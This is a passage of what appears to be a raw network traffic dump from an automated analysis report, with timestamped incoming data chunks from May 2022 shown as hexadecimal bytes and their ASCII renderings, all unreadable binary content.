                                                                                  2022-05-02 11:03:15 UTC2459INData Raw: d4 45 9b 46 f0 fb 00 9b c9 d0 a3 1c 0f a9 ee be 92 5a 2f 07 c0 84 b7 47 82 f8 7d 01 aa 35 88 70 00 e3 e7 6c b6 ea 4f b2 06 ca 01 f1 c6 58 ad fa e1 7f a1 c5 bb 73 39 25 1c 89 64 ff b7 10 54 16 59 a2 8d 9c 34 94 e3 12 96 f3 a4 23 36 8e 29 24 b9 86 89 92 4b 50 b9 f3 67 59 70 1f 9f df 1f 37 95 c6 49 97 e5 fe 81 7d cd 9e aa 40 50 c9 31 c8 df e6 27 0c c2 7a 78 f0 92 4a ef 78 29 9b 4b af 16 e6 3e 9e ca 17 51 74 c0 2a e8 a5 6f 94 e6 aa da 14 1a fd fe a5 ec 1a f8 b1 96 31 98 72 60 2a 98 0a b3 2b e1 48 e5 7f a3 7a e0 ee 63 2d ec a0 08 cb 3d 59 3d aa 93 ee f5 fc e4 85 ce aa 1d 7f f0 7f 87 86 c1 c1 ab 5a 9f 41 06 d8 7b ad d8 e9 1f f5 bc ef 25 2b e4 ea 54 91 86 e9 45 d4 45 e8 87 17 8b 34 c5 18 1b b5 59 ae 78 41 f3 24 1f 52 fa 3c 28 65 6b b5 25 11 38 3f 05 e6 64 01 39
                                                                                  Data Ascii: EFZ/G}5plOXs9%dTY4#6)$KPgYp7I}@P1'zxJx)K>Qt*o1r`*+Hzc-=Y=ZA{%+TEE4YxA$R<(ek%8?d9
                                                                                  2022-05-02 11:03:15 UTC2460INData Raw: fa 02 94 af e4 e7 27 29 01 21 bd de fd 4c 63 e4 bd aa 31 cc 6f d6 3e 1c cd 07 4c 14 48 97 02 52 92 8e a2 7f ee 3b 74 c9 c0 27 f7 20 dc 73 b9 5a ff 04 db 51 e3 b8 93 fb a6 81 b0 21 63 19 c6 52 98 58 0a bf b1 ec 49 2a 6f 3b e3 ad b6 a6 a0 9c c3 a1 d2 30 02 16 83 a7 d6 cb f0 10 24 11 c7 2d 36 d1 13 e7 d9 8d 21 f7 60 ab 86 e6 f9 2a 84 84 29 76 0f b1 39 38 e4 57 d6 7a ff d0 23 2e 9f 26 ef 0f 8c a8 c5 1c 9c aa 8c 3c 39 a8 51 43 61 9d 91 a6 b1 42 8f 0e 14 6a f5 20 7e dd d5 57 20 3f 03 ea 56 a6 22 28 6b 5d bc ba 64 90 7e 31 76 49 64 e7 43 9e 79 4a 02 04 54 7f ae 39 36 e0 41 06 57 7d 5f 59 c0 8d 91 39 c2 4c 20 8d e2 7d f0 ea 05 55 e2 43 cb 83 9b d1 1f cb 80 2e 9a d7 d1 78 79 36 64 cb 5b 9f 5b ae 4f 05 40 5f 2a 8c 99 24 31 4e dd 2a ea b2 ac 61 a1 2a b6 a3 da 57 a9
                                                                                  Data Ascii: ')!Lc1o>LHR;t' sZQ!cRXI*o;0$-6!`*)v98Wz#.&<9QCaBj ~W ?V"(k]d~1vIdCyJT96AW}_Y9L }UC.xy6d[[O@_*$1N*a*W
                                                                                  2022-05-02 11:03:15 UTC2462INData Raw: 88 cb 38 3c 03 98 31 89 43 e2 ef f5 19 5f 22 57 b8 d3 31 56 f5 10 98 56 97 c4 67 a3 61 a4 b3 84 b6 01 4d 7c 6a c0 b9 84 7f 9b c4 5e 00 b0 f1 8c 9c f9 56 b0 0e 78 29 ef c6 3b ce 5d b7 2b 1f f8 40 62 7f ef 9c 59 f1 bc 4b 49 70 e4 86 4e 1a 23 b0 e9 a9 dc 0d 7f cc 33 4a a7 f9 7b 19 a1 11 57 82 cb 29 85 0d a5 6e 44 a7 96 ab 95 72 22 03 14 5a 72 6e b7 93 05 5f d4 76 dd 32 48 3d a1 54 22 d8 7a 5a 40 5a f8 a1 d2 32 e7 f3 3d cf 98 e9 1b f5 4d d9 c4 00 c6 10 5c 73 87 41 25 97 8f 25 3e 78 c8 b5 45 97 94 45 d4 26 86 3a 33 18 25 bd fd 70 28 82 31 ee a6 67 77 bd 1f 15 49 d1 5b e8 eb ec 54 84 b8 83 96 7e b0 4a 71 95 25 15 8b c5 0e fc d2 02 d5 27 ae 0d 35 1f 30 48 5e c2 2e 93 e8 0f 76 38 f3 09 10 7b 16 30 79 cd b9 42 23 2b 97 e6 11 8c 28 8e e9 fa b0 53 74 84 f7 a7 fa bd
                                                                                  Data Ascii: 8<1C_"W1VVgaM|j^Vx);]+@bYKIpN#3J{W)nDr"Zrn_v2H=T"zZ@Z2=M\sA%%>xEE&:3%p(1gwI[T~Jq%'50H^.v8{0yB#+(St
                                                                                  2022-05-02 11:03:15 UTC2463INData Raw: b7 da 11 e3 e4 53 5d 17 85 50 05 d5 10 6e fd 4b db bd 47 99 f4 6f 7f 3f 60 1c db f3 51 a4 65 9a 5b 43 f7 25 fc 63 34 4e ed ba f4 28 5f a9 32 60 68 e7 14 3a ba b0 e5 1c a0 fe 10 cb 5c 57 cd b8 90 65 38 30 d1 66 b3 39 b2 c1 47 dd f3 01 bb 2b 00 a1 ac 63 5e dd 35 52 03 5f 91 da e9 6b 6a 6e 31 7b 78 03 8e 6c 48 30 2b d1 2d b5 79 5d 7d da ab d5 ca 98 b2 66 08 1d 59 66 a9 b9 e5 5e 1f 9b 47 f9 a8 3d 83 e2 85 55 aa d2 93 d0 4c 23 e5 f5 a1 94 6c d2 24 a5 2b 1c 7a 9c 79 f0 29 f0 67 a4 a4 3d b7 48 e3 e8 ef e7 5e 94 54 7d 8f 86 9e 5c 30 da de 13 89 72 96 bd e3 39 4c c5 89 71 46 f5 16 dc a3 e0 ef 6d 67 95 20 b5 f0 21 28 87 9a 4a 15 c2 33 7b 85 c6 bf 66 64 85 37 31 c8 2c 6e 25 f3 b7 5a 67 de 7f fa fc ed 2b 0c d2 bf 64 dd 3a fe 8f 91 c4 93 df c4 5a 1d 83 d8 0e ac f3 46
                                                                                  Data Ascii: S]PnKGo?`Qe[C%c4N(_2`h:\We80f9G+c^5R_kjn1{xlH0+-y]}fYf^G=UL#l$+zy)g=H^T}\0r9LqFmg !(J3{fd71,n%Zg+d:ZF
                                                                                  2022-05-02 11:03:15 UTC2464INData Raw: f2 e3 99 4f 48 4a e6 d0 21 75 ba f3 ca 47 36 b9 f4 4c a7 3f f6 cb 12 4a c2 2d a7 da 18 5d dc 76 b3 ba c9 08 3b 20 b0 f3 0e 56 f0 c5 82 46 11 aa 69 99 92 cf d7 b9 18 f9 b4 9b 6e 2e 29 0e 86 74 46 7a 5f ad 05 4c fd 34 81 85 31 ba b5 1f da 5d 01 84 a9 c0 92 01 f5 65 34 12 c9 84 dc fa 1b 59 0a fc 9f d2 c1 08 4c 29 be f8 fa 49 5d f8 59 0d 1d 96 5f bc 9f d3 5b 82 de cb 37 0e 1e 78 e2 f4 e4 97 3a d3 8f e5 d4 92 74 6d 31 15 fe f7 65 0d db f2 66 aa af 5c b1 77 b9 9e 43 7b 0b 93 06 9a dd 34 22 9d 19 fa 37 f6 bc ba c0 04 2f 25 7e 99 71 a0 0f bb c0 ca 99 05 e0 cf 47 44 d5 40 5c 69 1d 04 bf 89 98 4d 15 f3 00 13 2c ce ce f0 cb d9 e9 49 62 5d 9c 37 36 32 56 4d 0e cd c7 0c 52 3d d6 8b 54 c5 3e 0e df 8b ba ad 9a c4 59 7e 87 76 cf 8a 99 42 b4 51 12 29 9c d1 ba 02 51 c3 8b
                                                                                  Data Ascii: OHJ!uG6L?J-]v; VFin.)tFz_L41]e4YL)I]Y_[7x:tm1ef\wC{4"7/%~qGD@\iM,Ib]762VMR=T>Y~vBQ)Q
                                                                                  2022-05-02 11:03:15 UTC2466INData Raw: fe 1e 57 7f 64 d6 23 fb 9d 44 06 55 54 7a 5c f2 8c af ac 12 b4 ea be ec c6 0f c9 ce d5 2f bc 9d aa 1d 07 ff bc 5c d7 eb 78 0e 9a f0 33 13 e3 74 a0 32 34 5a 25 7b ce 85 a5 45 13 dd 9d 0e af d0 87 be 52 32 f5 17 24 95 66 dc 7e bc ec 13 cc b8 66 1e 1b 67 ef cf 7e fa 5d b4 ea 5e 0e dd 4b 15 0d 0e e2 41 73 82 a6 94 60 b5 7a 81 7f 16 c5 12 9a 83 d7 e3 ec 5e 80 13 b3 a7 3b 44 71 75 5d b9 a7 80 23 87 bf 81 b3 e6 bf db 7d 8e b2 3e b7 1d 16 84 1a 9a 68 4a 04 6a ab 4f e6 1e 46 df 99 68 b8 48 7f 8d f6 37 2d 2d b4 19 49 1c 93 7f 74 b9 9d cd 75 f3 64 bb 3e 8e b9 27 74 36 77 fe d1 2f 6f 41 e6 d2 16 ec f0 73 87 26 c6 e7 c7 71 69 c6 5b 61 d8 ef c8 e6 9d ba 97 c6 82 20 90 fc 68 63 93 92 f4 50 16 4b 4b d9 ba dd 2e da 4e 60 e9 b2 45 13 77 5e 8c 40 6e a7 9b 57 2c e1 8e ed 88
                                                                                  Data Ascii: Wd#DUTz\/\x3t24Z%{ER2$f~fg~]^KAs`z^;Dqu]#}>hJjOFhH7--Itud>'t6w/oAs&qi[a hcPKK.N`Ew^@nW,
                                                                                  2022-05-02 11:03:15 UTC2467INData Raw: b6 cb 9b a7 c5 27 71 bf 62 0a ab ea 3e 93 bb b0 3e f8 8e c2 54 ef e8 e4 1d 77 7a 4e 87 cc 28 fa c4 d5 1d 71 a3 84 d6 d9 93 43 c7 5f d0 49 8a 2f 0a c3 14 00 2e bc ad 4f 39 1b 8e e8 f5 6d 46 a0 f4 bb a6 fc 95 60 c5 94 9d f1 8a 10 87 e2 91 91 db 75 82 b6 c2 b3 e0 a6 56 d9 a2 6c 8c 88 24 da 2e 98 96 17 fc cc e4 a1 3c 67 66 e4 55 9d 42 50 28 f1 b3 e3 c7 c8 90 ec ae f6 a4 61 5d 37 bb 6b 35 f2 32 0d 4b de ce 74 5d 84 ca 34 0e 1c 5a 81 28 ce fc 26 f0 02 20 f1 33 d8 b1 c8 a3 3a 2d b6 78 ba 12 40 5d a2 ce e2 14 89 c2 a2 50 cb 2f 87 32 c1 e9 8d 20 ce 99 e9 c8 5a 13 5c 6e d4 41 e0 da a5 51 37 4a dd 39 33 fb 8d 22 ed 26 d1 48 a6 9a bf 6f f6 a4 c8 db fe cc 46 0c af 1a b1 ec 85 ee 6a 57 ed 29 b7 c2 68 0f 6a cb 56 45 1b a7 c8 76 9d 7a a3 f6 eb 58 eb a0 df 31 16 a7 9c ae
                                                                                  Data Ascii: 'qb>>TwzN(qC_I/.O9mF`uVl$.<gfUBP(a]7k52Kt]4Z(& 3:-x@]P/2 Z\nAQ7J93"&HoFjW)hjVEvzX1
                                                                                  2022-05-02 11:03:15 UTC2468INData Raw: 19 ef ad c9 63 7c 9d d2 9a fd fa 22 2d 84 27 23 07 dd 6b a4 93 8f 0c f6 4c ae 16 15 ca 2e ec 86 30 aa f9 e6 47 eb 7f 7c 69 d4 49 8f 95 8d 9e bd 2d 05 f2 a2 6d 66 fd 9e ec 51 92 92 10 8f 25 84 c6 f4 5c 07 1a 73 05 c1 ad 85 aa 95 4b 4a 0b 25 f5 ed 38 52 86 85 be b4 99 0b c1 12 f1 9b 9a 96 28 2f 55 c4 16 9e 09 1b 7e 2b 98 ac d5 94 de 5a dd 6b 80 6f dd fd 41 1f 56 2a d1 c9 8f c8 e6 97 a6 46 e7 e2 fc e9 61 8b ac 78 81 eb 19 22 df 4c 80 7c 0b 6b ab 22 95 10 23 82 26 fa 9a 4d 47 a4 7a 31 25 a2 8b 21 ec f7 eb db 88 ab 9c 4c 89 3c 39 51 25 9b 35 b6 af b9 89 02 12 28 0c 55 cb 9d 93 3d 61 85 95 e9 77 fb ed 16 74 e3 1e c6 fa 9e c9 f7 76 69 f1 3a ad 4e 7f 53 a4 e5 6c ed fd 23 cf 72 64 d1 b5 f9 6f e0 75 1e f3 1c 16 e8 cd 10 69 9b ab 1e cf ca f0 2d e8 d3 0e b8 87 0c de
                                                                                  Data Ascii: c|"-'#kL.0G|iI-mfQ%\sKJ%8R(/U~+ZkoAV*Fax"L|k"#&MGz1%!L<9Q%5(U=awtvi:NSl#rdoui-
                                                                                  2022-05-02 11:03:15 UTC2470INData Raw: 8a b5 85 63 f2 7b 80 69 57 1d e7 5c fe cb 83 ae 8f c9 6a 48 b8 6f a1 a9 de cf 93 b9 eb b9 a2 25 07 06 7c 1d 00 50 98 ba 18 e4 53 d4 a0 86 a3 dc 93 60 b5 57 a0 7f cd b1 d6 a8 ed 2d aa 1c b3 72 08 4f 60 f6 96 55 5f f5 06 4d 19 17 32 9a c7 94 68 8a a0 23 fd 5f 55 45 cf 2e a8 24 46 d0 0f d8 7e cd fe 45 c4 17 7a 96 7d 51 38 bc 7d ed 6a c1 72 ac 26 06 f6 6e 41 39 bd ac a6 cd fe 85 af e7 af 51 ac 05 24 fa 1a 83 08 23 4e 4c 13 2b d2 8b fa c8 13 3b 96 a3 ca 72 f1 bc 63 7c 69 e0 43 f6 63 cc f0 0e 47 c4 d6 91 2c 81 e7 78 bd f9 a0 77 bd 9d 80 97 b6 7b 48 1c 13 ea 64 e7 5e 44 a9 87 ad 53 b6 3c 66 e6 1a e1 44 db 4e 13 74 be 96 fb 6d 04 40 18 d8 d3 05 32 0f ef 9f ec c8 bf 0d 57 fd 2b 52 af 10 4d b8 ac 04 70 6d 5d ad e9 78 2a 41 92 87 2c 8c 22 d4 78 0c 46 57 4e 33 72 d6
                                                                                  Data Ascii: c{iW\jHo%|PS`W-rO`U_M2h#_UE.$F~Ez}Q8}jr&nA9Q$#NL+;rc|iCcG,xw{Hd^DS<fDNtm@2W+RMpm]x*A,"xFWN3r
                                                                                  2022-05-02 11:03:15 UTC2471INData Raw: 90 c1 a7 55 30 05 08 e6 c2 6a 95 4b 57 48 b3 51 62 26 a9 18 75 d8 99 5e c0 53 06 93 8b f7 57 4c b3 04 e8 fe aa 49 a3 80 94 2c 79 30 37 96 3b eb af 93 63 3f 44 de c4 a0 3a 25 c8 5e 80 82 29 81 36 58 52 0d 76 6e eb 0c b1 02 b8 cc ea 49 04 33 ac e5 8d c8 be c7 89 66 f4 71 31 4d 55 df bf eb 83 79 1a aa 73 60 37 e8 c6 75 81 28 16 6b 46 0d ef fd d1 4a bf 1b e1 bb 25 a4 87 15 eb 76 a0 7a 7b f3 d1 d1 ee c8 84 af 48 13 ee 65 24 fd d6 b6 ce 95 2b e2 f5 5a be 26 d6 8e 7e a6 73 92 a5 15 84 31 a3 4d ba 29 93 64 df 60 f8 78 62 6c c5 bc d0 ab 77 45 db 7a a6 e5 ac 39 e2 c7 a1 a7 4e e3 83 f0 3d f7 11 b5 22 8e 56 67 8f d3 97 55 a5 01 29 c5 62 54 77 22 bc 4b 07 a8 c4 8e cc 27 e3 92 05 04 44 33 e2 f4 86 0c 96 c8 80 58 d1 12 5a 2b ee 31 00 ca e1 43 d0 11 b4 97 b6 d3 bb cf 01
                                                                                  Data Ascii: U0jKWHQb&u^SWLI,y07;c?D:%^)6XRvnI3fq1MUys`7u(kFJ%vz{He$+Z&~s1M)d`xblwEz9N="VgU)bTw"K'D3XZ+1C
                                                                                  2022-05-02 11:03:15 UTC2472INData Raw: 0b 17 1f 11 3a 2f 77 f5 11 99 91 19 f4 76 07 ee f6 dd 3c dd ae 75 ed 10 e4 99 33 3d 4c 63 62 cb 6b de 5e 5d b5 df 9e 40 3a 32 c0 79 62 ce 1e 48 c3 8a a2 f6 9f ef bd cb 6d 0e 9a c9 93 57 11 11 54 e8 fd d6 f4 f6 99 ad c9 4f 71 83 eb 97 b4 7f 06 c6 0f 43 4d a4 b3 49 40 a4 2f 71 c5 d2 eb 53 43 0d 4e cf d5 97 5e c0 49 73 41 f0 3e 30 b9 19 3a 76 39 a8 7b 0f 82 0e 7b 98 7c 13 22 6b ad 35 fe 91 cc c5 36 cc b4 d1 c7 12 bf be ac 34 d0 59 fc 7f b0 74 be 46 82 ad c9 fd 12 8c 0d 89 8a a0 90 2f 69 16 0c 58 61 4a 99 47 c4 0d b8 f0 ef db cf 86 87 c0 34 d2 c8 0b bf 0d a8 b9 1b 64 a4 94 b3 23 5d 7b 35 81 88 ad 93 f6 00 f4 b3 fe e5 94 3f c2 6f 0f 56 77 50 73 ac d4 bc 0a b2 df 63 c8 72 36 14 07 34 d5 d5 84 81 d2 57 78 a8 27 c5 27 a6 ad 95 8f c0 89 7c e9 8f bf 64 d6 ef 67 81
                                                                                  Data Ascii: :/wv<u3=Lcbk^]@:2ybHmWTOqCMI@/qSCN^IsA>0:v9{{|"k564YtF/iXaJG4d#]{5?oVwPscr64Wx''|dg
                                                                                  2022-05-02 11:03:15 UTC2474INData Raw: e6 4f 16 7c 41 22 f4 28 86 ff 5f 76 b0 f1 78 c6 47 f0 09 37 2c ac 01 4a 37 53 f7 fb 59 82 c6 b8 35 cb 45 07 4c 6e 51 7a c6 15 90 67 81 71 02 fe 46 57 13 3a 31 1d 65 1b 82 8d e4 dc 2e 1d b5 53 66 67 72 f8 24 39 98 c5 25 fe ed 63 99 c7 d2 bd 1e c0 18 83 fc 30 47 7a a2 22 64 59 d8 1c 06 ac 74 01 d4 63 e6 7b 16 c4 35 c3 0f aa d5 d9 bc 71 10 28 6b ae 5b 50 72 26 32 64 1b b6 3e b3 d8 8d 76 89 80 27 d1 68 eb 04 26 0c 65 b9 0b f8 50 0c 3c 51 0b e1 6d 30 ba fe 75 46 38 63 7f b1 12 8f 3d 9b 4a e0 9f c7 76 2d d5 35 59 20 ac f5 76 b7 66 d7 89 32 3d ab 88 93 42 f6 42 0b d1 1a 5e 1c 44 79 ba 35 98 7c e2 84 83 ce e6 57 74 c7 0a 65 6b 0a e7 b6 0e c4 e2 0d e1 e1 a0 95 52 8e 8a 56 b7 2f 6a 6f d3 23 47 65 28 f8 b5 f1 52 62 f0 b0 4c e6 8b 38 8f 3f 78 4b fa 65 12 0e c6 a3 9c
                                                                                  Data Ascii: O|A"(_vxG7,J7SY5ELnQzgqFW:1e.Sfgr$9%c0Gz"dYtc{5q(k[Pr&2d>v'h&eP<Qm0uF8c=Jv-5Y vf2=BB^Dy5|WtekRV/jo#Ge(RbL8?xKe
                                                                                  2022-05-02 11:03:15 UTC2475INData Raw: ea 56 ff 03 37 6b 28 70 d1 ec 4f 70 6c 91 74 43 c4 b5 c2 46 b9 bc 7e 2b fb 28 48 9b 5b e1 1d fa 03 c9 d4 e6 a1 25 29 46 70 a6 c5 d8 ed f0 c9 8b 55 79 da 0e df ca 1f c2 39 75 cd 3d ab 1a 7d e2 f3 5d ab 24 42 22 d9 a1 a8 e4 66 5b 17 92 a2 4f d1 51 03 4a 97 1f 9b 04 b6 d6 6f 0b c9 c8 e2 fc f4 2d 2c 5b de 9b a8 05 29 83 dc 41 94 ea 4a bf 05 7b a5 c5 66 d3 27 0d fe d8 12 fe be 28 2e c6 f9 2a d9 a5 91 f1 64 5d 9b f3 8f 48 3a b4 64 11 90 7e 94 18 6b 0f da 0c 20 04 c2 91 a5 86 ed a9 3d a9 8a d5 81 a4 10 e8 3c 94 bf f0 61 02 83 20 02 8a 16 2d fd a6 af 06 2e 9e fe 87 70 50 15 77 bf 6d 6b 02 d7 cb 16 3d 72 3b 79 73 89 2f c3 60 a6 5d 12 20 43 79 01 3f 56 06 c1 2a 24 7d ed 78 0f b7 66 34 64 71 f7 0a 2b 86 87 9f 98 e2 05 c4 a3 49 10 16 af 96 33 d3 81 23 5a 52 46 d8 d4
                                                                                  Data Ascii: V7k(pOpltCF~+(H[%)FpUy9u=}]$B"f[OQJo-,[)AJ{f'(.*d]H:d~k =<a -.pPwmk=r;ys/`] Cy?V*$}xf4dq+I3#ZRF
                                                                                  2022-05-02 11:03:15 UTC2476INData Raw: 6f 12 af f8 c4 04 dc 1f f7 c5 93 21 59 60 5f 20 19 d5 5f bb b2 f6 f1 fb 68 e6 79 28 ab 27 28 fd d8 89 34 cd 54 79 2d 7f 03 e8 06 ff 13 ce 6e dd d4 5f 8d b0 4b 84 06 0d ab 93 6d 08 78 5a cf 8b a9 3a a7 42 e4 b1 91 2d ab 3c 6e 44 51 1b 0e 20 aa af ae 66 fe d0 7c 42 a0 8a af 57 5f 95 b8 ec c4 22 e8 2e 60 00 e5 16 f4 12 1d fc db da 9e 4e 21 33 2a 61 13 50 47 d1 15 a8 26 ee bf 22 f8 21 c8 cc 33 b7 23 ef 6f f0 48 24 75 6f 12 86 fe 00 fc f0 06 08 44 dc 29 0c 2e 7d df ac 19 3d 54 b7 2d 63 81 fc 46 8f ae 4e 80 24 4d 9a 9b 4a 2e 78 1d 2e 3f 5a 37 8f eb 6f 7c 4f 6a 50 34 7d 4b 1f 9a ee c5 25 1c 6c 3d d3 0b c6 c7 8f d2 08 e8 d2 5b 38 fa fc a1 4f 5d 34 d3 95 d3 b1 06 c5 f7 50 a3 6e da 35 b8 2c 67 27 90 86 b4 3c 50 30 c0 94 bc 72 bf c6 a1 f0 7d a6 af d4 e7 97 b2 b2 fb
                                                                                  Data Ascii: o!Y`_ _hy('(4Ty-n_KmxZ:B-<nDQ f|BW_".`N!3*aPG&"!3#oH$uoD).}=T-cFN$MJ.x.?Z7o|OjP4}K%l=[8O]4Pn5,g'<P0r}
                                                                                  2022-05-02 11:03:15 UTC2478INData Raw: d9 e1 4e a8 0a 75 11 42 2e 60 a1 7a c8 59 9a 27 71 fc ac e9 93 5c 20 d6 1d 6f 21 b5 17 11 68 f7 20 64 d9 eb db c0 f9 68 a5 1b 8e 33 23 0a 9d 5a 4d c0 5c ac 4d 41 10 52 9d ad 6f ee 0f 80 06 8d 87 43 d0 1c 29 69 99 bc 37 d9 23 cd 78 c7 e3 2c b0 ef aa f3 9e 91 8e d8 2c a2 c9 b1 df 21 5e c6 a1 cf cf c8 2d d2 43 37 b9 42 31 22 47 47 ea ee 47 d0 64 76 55 a5 c3 02 71 ee 33 19 5a 27 68 1f 18 95 6a b5 d8 1d eb 32 d4 ee 44 0b f5 9e 1a 6f 02 43 66 cc 25 e4 b2 97 99 06 d4 d5 b6 99 fb 0d c3 b1 21 46 1b 33 a6 47 25 b3 8b 17 c7 5d 26 ae 9b 38 6d 08 8f 97 46 41 df 0e 33 fe 85 50 03 d7 6c 7a 8b 8f ad 7c 29 79 59 63 a1 52 52 2c 7c 75 c0 ae e3 88 57 ad 03 27 74 5c b2 61 2a 6d aa 7f 2c a9 fc 02 fd 9b 80 7b ae ec 4e 82 28 77 7f 48 88 95 34 14 49 7c b3 26 aa df 27 a0 ba dc 1f
                                                                                  Data Ascii: NuB.`zY'q\ o!h dh3#ZM\MARoC)i7#x,,!^-C7B1"GGGdvUq3Z'hj2DoCf%!F3G%]&8mFA3Plz|)yYcRR,|uW't\a*m,{N(wH4I|&'
                                                                                  2022-05-02 11:03:15 UTC2479INData Raw: 88 eb 13 5e f9 d2 7c 81 8e e0 7b df ef 0f 76 98 2e 1b 35 eb f4 48 ba 28 3b 90 eb 02 e1 4e d3 ec 54 55 34 e8 db ff c2 52 3d 5c 4d 41 98 03 4a 78 fd 6f 52 0d 35 6b 25 5e b1 31 37 e0 e0 95 37 ac 87 ab 61 16 17 8e 03 81 35 70 ba 92 37 4e 19 8a bf 12 2f 66 23 ee b1 22 c2 31 08 97 06 db f8 c6 89 c0 99 c9 c3 3f a1 08 b8 19 c7 e9 ce 0f be 4b 28 16 f8 e2 6f f5 fc ce c1 40 0c af b8 87 a4 ab a5 0d 35 f6 9a 5f c5 a9 3e db fe 0b 04 0b c7 59 e4 7a 22 0a 70 08 30 9a 1d b6 00 f1 1a 49 52 a5 c1 8b 4e bc b8 a3 88 c3 40 39 aa 51 97 c0 cb c6 20 13 e0 d8 b3 a9 d1 eb 41 67 e6 b9 7d 0f a3 13 f5 7e 95 7a 61 cf 2a 40 02 87 b0 3b 9c 5f 85 4e 1e 20 3b 17 51 79 90 8e 34 66 7c b1 48 6f 80 56 08 29 ba 30 bd 83 bd a2 b7 79 2f 63 e7 59 07 42 87 cd d4 96 a0 5e 88 b0 89 d3 ab 95 88 b9 18
                                                                                  Data Ascii: ^|{v.5H(;NTU4R=\MAJxoR5k%^177a5p7N/f#"1?K(o@5_>Yz"p0IRN@9Q Ag}~za*@;_N ;Qy4f|HoV)0y/cYB^
                                                                                  2022-05-02 11:03:15 UTC2480INData Raw: 90 91 be 23 67 53 39 ec ec 18 39 ca 8f c1 58 a6 6f a8 d8 46 d2 d5 da c4 33 dc 25 57 37 a7 95 4e 6b c7 ea 21 c4 7e ef 59 43 52 bb d3 f3 78 32 01 f7 df 0f b0 db 21 67 1e 71 1c 1a 25 8b 4a cd 48 7f 55 50 d9 96 80 4c f1 c4 3f 22 f9 07 e2 98 83 23 eb b8 a2 ac e8 d0 3b 5d 98 f4 00 6f 8c 88 54 98 14 0b 91 9e cd e5 35 04 f4 67 12 b0 0f 7b e5 86 73 fc 0d f6 89 f4 2f 1a 41 ef 51 dc 56 ec 62 6f 46 1c 04 cd 4e b8 ef 40 e9 3b 8d c3 df 31 f0 4d c4 c9 a4 53 ee 5b 05 c4 87 37 ce 0e a1 55 ca bc 5a ec ab 8f 20 50 14 27 6a 95 01 c2 82 dc 39 07 8a f6 d1 ee d7 e3 32 6d ce 41 63 9d 22 45 5e 30 f7 86 6a d4 e5 6b 45 54 9e 73 f7 69 7e f4 36 6f e3 ea 47 21 3d 8f b1 8b 8e 3d 09 ae 52 b0 90 53 68 b4 1c f9 8d c7 c8 71 f7 a5 85 e8 b5 f9 ef 2b 32 68 56 5e 9b 4e 10 1e 3a 91 33 fe 33 20
                                                                                  Data Ascii: #gS99XoF3%W7Nk!~YCRx2!gq%JHUPL?"#;]oT5g{s/AQVboFN@;1MS[7UZ P'j92mAc"E^0jkETsi~6oG!==RShq+2hV^N:33
                                                                                  2022-05-02 11:03:15 UTC2482INData Raw: 49 db c2 c7 7a 2b 44 c5 af 7d 10 c8 e2 7f a8 37 ac 8a a3 66 ab 46 b0 e1 75 7e 31 9e 52 19 34 02 cb 6f e6 4d d1 71 a2 47 74 2f 40 04 18 dc fc 80 4e 25 e8 09 c2 5e 8b cd 3f 9a 6a dc 97 f9 14 f3 6e ab ae a8 df 44 c8 0d ad 29 bf 92 9d 86 fc 62 19 56 96 4e ae 72 d1 25 88 e0 81 fb 7f 7c d6 d1 f3 05 51 b4 60 06 e5 38 5d 99 13 be d7 9d e3 61 50 ee 50 41 00 12 23 88 d7 ef a6 7b 78 a6 0d b5 93 1c 60 1c e0 ea 2b 77 89 0d b0 a4 b3 57 76 b6 d2 8a c8 97 8d 36 c4 18 18 a1 c7 41 5b 80 86 24 7b 29 ee ec aa c9 60 08 d3 4b 3f 3b 0a e3 78 c5 c7 e8 98 8c 8a 8c 36 b4 fb 7e b6 d1 8a 1d c7 76 4d a7 b7 04 a3 7a 7e ad a2 ed 59 8b 79 5e 7a ba ad 8d db 7b 65 1d 42 65 1e 95 a7 20 d4 6b f1 17 22 62 0c b1 3e 03 a1 e8 36 0f 3b a0 84 31 7f fb 9d 4f 7f 9e 45 28 5f 64 1b a9 d0 b0 6d 0b 2a
                                                                                  Data Ascii: Iz+D}7fFu~1R4oMqGt/@N%^?jnD)bVNr%|Q`8]aPPA#{x`+wWv6A[${)`K?;x6~vMz~Yy^z{eBe k"b>6;1OE(_dm*
                                                                                  2022-05-02 11:03:15 UTC2483INData Raw: 48 97 aa 6e 13 d9 74 50 b9 92 c8 61 87 25 10 7f 3e 36 c2 84 80 a9 5f 90 37 f5 32 c6 95 f2 71 10 a2 be 65 40 ba b2 7f 01 5c 18 9f 80 53 8c d7 bb c0 da 4d 26 fa fa b6 e9 1a 19 87 9c e0 cd db a7 a8 cc e0 55 83 0c 5b c5 b5 c7 a0 e7 cf 57 bf 20 ef 38 84 00 2f 7a 19 e1 b5 9b ca 2d 95 fe 8b dd 36 66 73 82 ca 16 30 ba 70 ff 6a 8e 15 e8 35 a1 8f db c6 5f 9d 1c c5 40 ec 55 ad a0 13 78 3c 97 b1 ca 95 f8 d1 c4 ba 93 05 89 00 fb 2e 8a d7 5a 0c 2f 13 82 17 e4 cc be 7e 64 eb de 03 0a 2c 48 97 3c a5 65 fd 26 99 d0 a1 26 03 78 01 34 13 44 c6 81 d1 82 5a bf 65 32 de 63 e3 ce 4d 61 86 9c 17 4e aa a6 82 ea b4 02 32 ed 51 11 d3 e4 75 e4 55 b2 c9 d1 f5 bb fd fb da 3c a1 65 69 93 b2 bf 29 e8 85 95 bc db 25 72 f8 2b 5b dd 8e e9 99 0b 66 27 4a d4 b3 b0 11 65 6d f2 4a 5b ec a1 6e
                                                                                  Data Ascii: HntPa%>6_72qe@\SM&U[W 8/z-6fs0pj5_@Ux<.Z/~d,H<e&&x4DZe2cMaN2QuU<ei)%r+[f'JemJ[n
                                                                                  2022-05-02 11:03:15 UTC2484INData Raw: 10 6e cb 24 74 5c f4 2f 4e 85 a4 e4 ba 39 dc 51 be 3c f6 77 6d fe d5 67 b1 f8 01 10 0a 70 6e 74 8f 83 fa 4f 1c 1b 19 f7 f6 38 31 b8 0d 7e b6 00 af e6 cc 92 b4 7f 00 8c dd 11 3b 05 d2 bd 34 2b f1 84 c6 90 cf 2d 07 d4 f4 9c ab f4 12 6c ea d0 70 09 e7 b0 ed f3 a3 f4 56 59 dc ce b7 6b 45 a7 62 33 e4 30 42 ad 2b 50 64 26 dc e3 a2 9a 50 41 1b ff f6 3b 66 61 2a dd 8d 1b b4 17 77 a7 62 b2 f3 a3 bb fe d7 65 4f 49 82 26 70 1e be cf 41 26 ca 97 05 d5 23 9b 37 20 ca 68 db 45 3f 85 2f a4 a0 34 5b 01 13 75 37 14 8e ce 90 fa 24 67 c4 f1 53 b4 c5 f6 aa 53 73 99 57 a6 0a 72 db e3 e9 21 4f 20 f8 5e 85 9f a3 fc 1c 18 9f ff bb 58 23 68 c2 e8 c9 04 b3 08 18 